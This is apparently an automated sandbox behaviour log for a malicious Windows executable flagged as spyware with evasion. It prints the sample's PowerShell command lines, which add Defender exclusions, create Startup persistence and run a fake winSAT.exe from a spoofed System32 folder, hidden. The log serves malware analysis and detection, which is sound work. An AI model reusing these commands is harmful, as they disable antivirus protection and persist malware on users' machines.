Source: YoS6ZBCcUy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.spre.spyw.evad.winEXE@65/132@0/1
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F97B90 GetModuleHandleW,FormatMessageW,GetLastError,LocalFree,_CxxThrowException,_CxxThrowException,19_2_00007FF780F97B90
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FDC700 GetModuleHandleW,FindResourceW,SizeofResource,LoadResource,LockResource,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,EnterCriticalSection,LeaveCriticalSection,vswprintf_s,_CxxThrowException,_CxxThrowException,FindResourceW,LoadResource,LockResource,SizeofResource,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,memcpy,_CxxThrowException,19_2_00007FF780FDC700
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeMutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeMutant created: \Sessions\1\BaseNamedObjects\31e24c48-f042-5745-a165-04e896e763b7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeMutant created: \Sessions\1\BaseNamedObjects\JESUSAPT-7R4T5W
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nscC29A.tmpJump to behavior
Source: YoS6ZBCcUy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSIS.EXE&apos;
Source: C:\Windows \System32\winSAT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSIS.EXE&apos;
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: winSAT.exeString found in binary or memory: ?Error: Use -? or -help for information on running this program
Source: winSAT.exeString found in binary or memory: ?Error: Use -? or -help for information on running this program
Source: winSAT.exeString found in binary or memory: ?Error: Use -? or -help for information on running this program
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile read: C:\Users\user\Desktop\YoS6ZBCcUy.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\YoS6ZBCcUy.exe "C:\Users\user\Desktop\YoS6ZBCcUy.exe"
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: iertutil.dllJump to behavior
